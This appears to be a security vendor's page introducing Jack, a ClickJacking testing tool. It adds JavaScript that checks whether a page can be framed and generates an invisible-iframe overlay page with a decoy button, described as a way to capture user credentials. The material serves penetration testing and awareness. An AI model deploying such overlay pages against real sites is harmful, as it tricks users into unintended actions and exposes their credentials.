ClickJacking is a longstanding web vulnerability: an attacker loads a target page inside a frame on a page they control and lays it, invisibly, over decoy content, so that a user's clicks and keystrokes land on the framed site rather than on what they can see. Used against a login page, this makes it easy for an attacker to acquire user-submitted credentials.
To raise awareness of this issue, we introduced Jack, part of our Web Application toolkit, and launched it at the BlackHat Arsenal in Amsterdam in 2015.
Jack lets a tester check whether a specific web resource can be framed, and is therefore vulnerable to ClickJacking, and if so, easily generate a ClickJacking Proof of Concept (PoC) page designed to trick users into submitting credentials.
- Drag 'n Drop functionality to position and create malicious elements over the framed resource in order to capture user-submitted input.
- Ability to generate local PoC instances of the ClickJackable resource and deploy them to a web container, such as Apache.
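The two steps Jack automates, deciding whether a resource can be framed and building an overlay PoC, are shown below as an added example; this is not Jack's own code. The check reads the `X-Frame-Options` and `Content-Security-Policy` response headers the way a browser would (an enforcing `frame-ancestors` directive wins over `X-Frame-Options`; anything other than `DENY` or `SAMEORIGIN` in the latter is treated as no protection, since `ALLOW-FROM` is not honoured by current browsers). The PoC builder places one visible decoy button and shifts an invisible iframe so the target's real button sits directly under it. Header values, origins and coordinates are constructed samples, and the scheme-less host-source rule is simplified.

```javascript
// Added example, not part of Jack. Frameability check plus a minimal overlay PoC.

// Return the source list of an enforcing frame-ancestors directive, or null if absent.
function frameAncestors(csp) {
  for (const directive of csp.split(';')) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length && tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1); // an empty list means "no ancestors", same as 'none'
    }
  }
  return null;
}

// Does one frame-ancestors source expression allow attackerOrigin to frame targetOrigin?
function sourceMatches(src, attackerOrigin, targetOrigin) {
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return attackerOrigin === targetOrigin;
  if (s === '*') return true;
  const a = new URL(attackerOrigin);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return a.protocol === s; // scheme-source, e.g. "https:"
  // host-source: [scheme://]host[:port], host may begin with "*."
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)(?::(\d+|\*))?$/);
  if (!m) return false;
  const [, scheme, host, port] = m;
  if (scheme && a.protocol !== scheme + ':') return false; // simplified: no http->https upgrade rule
  const attackerPort = a.port || (a.protocol === 'https:' ? '443' : '80');
  if (port && port !== '*' && port !== attackerPort) return false;
  return host.startsWith('*.') ? a.hostname.endsWith(host.slice(1)) : a.hostname === host;
}

// True when a page served with these headers can be framed from attackerOrigin.
function isFrameable(headers, attackerOrigin, targetOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);
  const attacker = new URL(attackerOrigin).origin;
  const target = new URL(targetOrigin).origin;
  const sources = frameAncestors(h['content-security-policy'] || '');
  if (sources !== null) {
    return sources.some(src => sourceMatches(src, attacker, target)); // CSP takes precedence
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return attacker === target;
  return true; // missing, ALLOW-FROM or garbage: browsers apply no restriction
}

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g,
    c => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Build the overlay PoC. decoy = {left, top, width, height, label} is the visible bait;
// realButton = {x, y} is where the target's button sits inside the framed page.
// The iframe is offset so the real button lands under the decoy, then layered on
// top with the given opacity (0 for the attack, e.g. 0.3 while positioning).
function buildPoc(targetUrl, decoy, realButton, opacity) {
  const left = decoy.left - realButton.x;
  const top = decoy.top - realButton.y;
  return `<!doctype html>
<html><body style="margin:0">
<button style="position:absolute;left:${decoy.left}px;top:${decoy.top}px;` +
    `width:${decoy.width}px;height:${decoy.height}px;z-index:1">${escapeHtml(decoy.label)}</button>
<iframe src="${escapeHtml(targetUrl)}" scrolling="no" style="position:absolute;` +
    `left:${left}px;top:${top}px;width:1200px;height:900px;border:0;opacity:${opacity};z-index:2"></iframe>
</body></html>`;
}

// Usage with constructed sample headers and coordinates:
const sampleHeaders = { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'" };
console.log(isFrameable(sampleHeaders, 'https://evil.example', 'https://bank.example'));
console.log(buildPoc('https://bank.example/login',
  { left: 200, top: 150, width: 160, height: 40, label: 'Claim prize' }, { x: 420, y: 310 }, 0));
```

Run the PoC with a non-zero opacity first to line the decoy up over the real control, then set it to 0; that is the manual equivalent of what Jack's drag 'n drop does. A resource that returns `false` from the check is not a candidate for a PoC at all, because the browser will refuse to render the frame.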
Jack is web based and requires a web server to serve its HTML and JavaScript content, either remotely or locally. To install, git clone the repository and copy its contents into a folder that is accessible to the web server. Finally, open "index.html" in your browser and you are ready to use it.
Jack in Action
Jack can be downloaded from our GitHub page.